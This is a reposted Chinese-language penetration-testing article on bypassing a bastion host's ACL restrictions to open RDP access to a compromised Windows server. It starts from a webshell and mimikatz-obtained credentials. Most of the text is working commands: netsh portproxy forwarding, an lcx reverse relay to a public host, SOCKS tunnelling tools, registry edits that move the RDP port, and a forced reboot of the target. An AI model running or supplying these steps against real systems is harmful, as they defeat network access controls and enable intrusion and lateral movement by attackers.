如何繞過堡壘機遠程登錄
本文轉載自微信公眾號「Bypass」,作者Bypass 。轉載本文請聯系Bypass公眾號。
假設一個場景:在Webshell中執行mimikatz獲取到win管理員密碼,并且本地查看端口3389是開放的,可是從當前跳板機無法遠程到目標機器。因為某個特定需求,一定要遠程登錄到這臺win服務器,這時該怎么辦?
首先我們先分析一下這個場景,端口開放卻無法連接,最有可能的情況,就是到達目標網段受到ACL策略限制,只允許通過特定網段登錄,比如說堡壘機。大多數堡壘機部署時,為了不改變現有的網絡拓撲結構,采用旁路部署的方案,通過ACL策略限制用戶訪問特定端口。
那么,我們就可以用另一種方式來描述這個問題:目標服務器遠程端口受到ACL限制,但其他端口沒有限制,那么,最簡單的解決方式就可以通過端口轉發來繞過。
1、使用netsh命令進行端口轉發
Windows自帶的netshnetsh實現端口轉發,監聽12345端口,轉發到本地3389端口,可繞過訪問策略限制。
- #A、3389端口轉發到12345端口
- netsh interface portproxy add v4tov4 listenaddress=192.168.126.32 listenport=12345 connectaddress=192.168.126.32 connectport=3389
- #B、查看配置好的端口映射清單
- C:\Windows\system32>netsh interface portproxy show v4tov4
- 偵聽 ipv4: 連接到 ipv4:
- 地址 端口 地址 端口
- --------------- ---------- --------------- ----------
- 192.168.126.32 12345 192.168.126.32 3389
這樣一來,通過攻擊機跳板機直接遠程目標機器的12345端口,就可以實現遠程登錄。
2、LCX 端口轉發
在目標機器上執行:lcx.exe -slave 公網ip 51 內網ip 3389
在公網的機器執行:Lcx.exe –listen 51 3340
本地機器上連接 127.0.0.1:3340,即可連接上目標機器的3389。
3、內網穿透工具
SOCKS代理,如Ngrok、frp、EW、reGeorg、sSocks等
通過利用SOCKS協議,結合Proxifier使用,可實現mstsc登錄目標主機。
4、修改Windows遠程桌面端口
通過修改Windows默認遠程桌面端口,從而繞過ACL策略訪問限制。
修改注冊表,命令如下:
- REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v "PortNumber" /t REG_DWORD /d 12345/f
- REG ADD "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 12345 /f
強制重啟目標服務器后,注冊表生效。
- shutdown -r -t 0
此時,就可以遠程目標服務器的12345登錄。
